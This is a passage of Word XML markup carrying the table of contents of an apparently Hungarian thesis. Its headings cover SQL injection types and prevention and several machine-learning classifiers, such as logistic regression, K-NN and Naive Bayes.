            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL INJECTION</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471962 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36A4069E" w14:textId="235644FE" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471963" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>1.1.</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Típusai</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471963 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D9EA80D" w14:textId="333EF29C" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471964" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sávon belüli (in-band, classic) SQLi</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471964 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AA1CD98" w14:textId="1877A43C" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471965" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vak (blind, inferential) SQLi</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471965 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C591604" w14:textId="108D1CBE" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471966" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.3.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sávon kívüli (out-of-band) SQLi</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471966 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50AE4A1B" w14:textId="27336B3E" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">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1471967" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>1.2.</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Megelőzési módjai</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471967 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="495DBF8E" w14:textId="49864A60" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">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1471968" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GÉPI TANULÁS</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471968 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C8A8AF2" w14:textId="16A20627" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">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1471969" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>2.1.</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Felügyelt tanulás</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471969 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A013004" w14:textId="0F8A7C38" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471970" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>2.2.</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Osztályozás</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471970 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A9BFBF1" w14:textId="0A756AB8" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471971" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>2.2.1.</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Logistic Regression</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471971 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D1D3B5F" w14:textId="7181E193" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471972" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>2.2.2.</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K-Nearest Neighbors (K-NN)</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471972 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="757B77DC" w14:textId="0A184A68" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471973" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>2.2.3.</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Linear Support Vector (LinearSVC)</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471973 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CB236A6" w14:textId="378B844C" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471974" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>2.2.4.</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Gaussian Naive Bayes</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471974 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BE73E5D" w14:textId="24E4BB5B" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:pStyle w:val="TJ2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
